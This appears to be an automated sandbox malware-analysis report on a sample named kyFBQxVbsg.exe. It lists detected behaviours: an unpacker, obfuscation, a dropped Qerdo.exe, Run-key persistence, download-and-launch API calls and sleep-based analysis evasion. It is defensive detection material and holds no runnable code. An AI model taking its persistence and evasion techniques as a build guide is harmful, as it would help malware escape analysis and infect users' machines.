Source: Yara match	File source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.587908821.0000000004060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.581326592.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR

.NET source code contains potential unpacker

Source: kyFBQxVbsg.exe, hlrc.cs	.Net Code: qmvy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.Qerdo.exe.40000.0.unpack, hlrc.cs	.Net Code: qmvy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024A2827 push ebx; ret	0_2_024A287A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8FF5F push es; ret	3_2_00C8FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004594FD push esi; ret	17_2_00459506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00431786 push ecx; ret	17_2_00431799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00453798 push eax; ret	17_2_004537B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00452E76 push ecx; ret	17_2_00452E89

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040CE58 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

17_2_0040CE58

Source: initial sample	Static PE information: section name: .text entropy: 7.9984009418791
Source: initial sample	Static PE information: section name: .text entropy: 7.9984009418791

Drops PE files

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00405CE1 ShellExecuteW,URLDownloadToFileW,

17_2_00405CE1

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qerdo			Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qerdo			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_004172C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

17_2_004172C8

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_0040CE58

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040D26E Sleep,ExitProcess,

17_2_0040D26E

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe TID: 5096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe TID: 6616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe TID: 3488	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

